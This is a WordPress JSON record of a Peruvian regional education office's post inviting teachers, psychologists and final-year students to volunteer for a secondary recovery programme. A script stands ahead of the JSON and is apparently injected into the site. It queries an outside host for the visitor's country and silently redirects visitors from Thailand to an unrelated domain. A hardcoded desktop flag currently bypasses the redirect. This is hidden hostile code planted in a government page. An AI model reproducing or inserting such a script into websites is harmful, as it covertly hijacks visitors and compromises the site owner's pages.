<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":1609,"date":"2022-01-10T16:57:31","date_gmt":"2022-01-10T21:57:31","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=1609"},"modified":"2022-01-10T16:57:31","modified_gmt":"2022-01-10T21:57:31","slug":"convocatoria-14","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/convocatoria-14\/","title":{"rendered":"CONVOCATORIA"},"content":{"rendered":"\n<p>La UGEL Arequipa Norte convoca a docentes, estudiantes del \u00faltimo a\u00f1o de Educaci\u00f3n, Psic\u00f3logos, estudiantes del \u00faltimo a\u00f1o de psicolog\u00eda, profesionales y estudiantes universitarios del \u00faltimo a\u00f1o; a formar parte del Voluntariado para el desarrollo de la Carpeta de Recuperaci\u00f3n Secundaria, y contribuir a que ning\u00fan estudiante se quede atr\u00e1s.<br>Las inscripciones se realizaran hasta el d\u00eda martes 11 de enero de 2022<br>Link de inscripcion:\u00a0<a rel=\"noreferrer noopener\" href=\"https:\/\/docs.google.com\/forms\/d\/e\/1FAIpQLSe1GiAwI2Es-NPvhnb_-WDIvsvQXmbKrVoxWMmIF88TZBRmeg\/viewform\" target=\"_blank\">https:\/\/docs.google.com\/&#8230;\/1FAIpQLSe1GiAwI2Es&#8230;\/viewform<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La UGEL Arequipa Norte convoca a docentes, estudiantes del \u00faltimo a\u00f1o de Educaci\u00f3n, Psic\u00f3logos, estudiantes del \u00faltimo a\u00f1o de psicolog\u00eda, profesionales y estudiantes universitarios del \u00faltimo a\u00f1o; a formar parte del Voluntariado para el desarrollo de la Carpeta de Recuperaci\u00f3n Secundaria, y contribuir a que ning\u00fan estudiante se quede atr\u00e1s.Las inscripciones se realizaran hasta el [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1610,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-1609","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-comunicados"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/1609","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=1609"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/1609\/revisions"}],"predecessor-version":[{"id":1611,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/1609\/revisions\/1611"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media\/1610"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=1609"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=1609"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=1609"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}